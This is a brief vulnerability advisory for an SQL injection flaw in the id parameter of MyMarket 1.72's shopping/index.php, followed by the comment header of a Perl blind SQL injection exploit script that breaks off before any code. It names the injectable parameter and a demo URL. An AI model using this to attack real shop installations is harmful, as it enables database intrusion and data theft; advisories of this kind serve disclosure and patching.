SQL injection vulnerability in shopping/index.php in MyMarket 1.72 allows remote malicious users to execute arbitrary SQL commands via the id parameter.
#!/usr/bin/perl
######################
#
#MyMarket 172 Blind SQL Injection Exploit
#
######################
#
#Bug by: h0yt3r
#
#Demo: mymarketsourceforgenet/demo/shopping/
#
##
###
##
#
#wwwsitede/mymarket/shopping/?id=bluah
#Ok when we give $id an unexpected value like this we get an SQL Error
#Union selecting seems not possib ...